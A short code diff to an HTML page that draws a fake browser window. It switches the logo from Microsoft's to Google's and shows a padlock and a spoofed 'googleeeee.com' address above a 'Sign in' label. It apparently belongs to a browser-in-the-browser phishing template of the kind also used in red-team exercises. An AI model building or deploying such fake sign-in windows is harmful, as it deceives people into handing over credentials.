--- a/index.html
+++ b/index.html
@@ -75,7 +75,7 @@
 		<div id="title-bar-width">
 			<div id="title-bar">
 				<div style="margin-top:5px;">
-					<img src="https://companieslogo.com/img/orig/MSFT-a203b22d.png?t=1633073277" width="20px"
+					<img src="https://upload.wikimedia.org/wikipedia/commons/5/53/Google_%22G%22_Logo.svg" width="20px"
 						height="15px" id="logo">
 					<span id="logo-description">Sign in</span>
 				</div>
@@ -87,7 +87,7 @@
 				</div>
 			</div>
 			<div id="url-bar">
-				<img src="https://asma1214.github.io/ssl.svg" width="20px"
+				<img src="https://asma1214.github.io/trial.github.io/iframeWin/ssl.svg" width="20px"
 					height="20px" id="ssl-padlock">
 				<!-- <p>XX-DOMAIN-NAME-XX</p> -->
 				<span id="domain-name">http://googleeeee.com</span>
